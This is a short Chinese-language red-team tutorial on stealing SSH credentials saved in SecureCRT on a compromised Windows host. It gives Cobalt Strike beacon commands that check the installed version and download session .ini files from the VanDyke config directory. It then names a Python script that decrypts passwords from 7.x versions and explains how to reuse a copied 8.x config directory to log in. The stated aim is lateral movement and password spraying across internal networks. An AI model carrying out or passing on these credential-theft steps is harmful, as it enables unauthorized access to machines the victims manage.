很多运维人员会将SSH的账号密码保存在SecureCRT上,当我们拿下这台主机后就可以同时获取到多台机器的权限,同时,在内网横向时,通过抓取密码进行碰撞是非常高效的手段,往往可以找到大量使用通用口令的机器。
解密方法有两种,方法一针对低版本(7.x及以下版本),方法二针对高版本,例如8.x。
注:如果SCRT启动的时候有启动密码,说嘛config说加密过的,这个就无法破解了。
首先,需要确认其版本
假设现在目标机器已经上线CS
使用powershell脚本:
beacon> powershell-import C:\Users\reboot\Desktop\ListInstalledPrograms.ps1(我们本地的脚本)
beacon> powershell Get-list
看到版本是7.3
确定Sessions保存路径
如果用户没有做过修改,那默认SecureCRT的Config目录路径为:%APPDATA%\VanDyke\Config\Sessions\
或者可以从图形界面上看:Edit - Global Options - General
Sessions目录下的ini文件就是我们要的东西
这里需要将我们要的文件下载到本地,例如我要的是172.16.81.134.ini,那么下载的话不限于方法,根据实际情况选择即可,例如我这里直接从CS上脱下来。
beacon> download C:\Users\reboot\AppData\Roaming\VanDyke\Config\Sessions\172.16.81.134.ini
开始解密
方法一
对于低版本,使用 SecureCRT-decryptpass.py
需要python2 + pycrypto
python2 SecureCRT-decryptpass.py 172.16.81.134.ini
问号处其实就上密码,但是因为版本的原因没有解出来,正常解出来应上如下:
方法二
对于高版本对,可以把 %APPDATA%\VanDyke\Config\ 整个目录拷贝到本机SecureCRT的Config目录下,然后直接连接。但版本要与目标的一致,否则可能出问题。